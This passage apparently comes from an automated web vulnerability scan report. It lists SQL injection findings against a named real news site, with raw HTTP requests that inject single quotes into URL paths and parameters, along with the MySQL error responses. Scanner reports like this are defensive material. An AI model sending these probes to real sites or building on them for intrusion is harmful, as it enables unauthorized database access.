Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.64. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.65. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.66. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.67. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content'/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content''/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.68. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article'/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article''/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.69. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.70. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.71. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/mailto/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font>
...[SNIP]...

Request 2

GET /component''/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.72. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/mailto/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto'/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto''/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
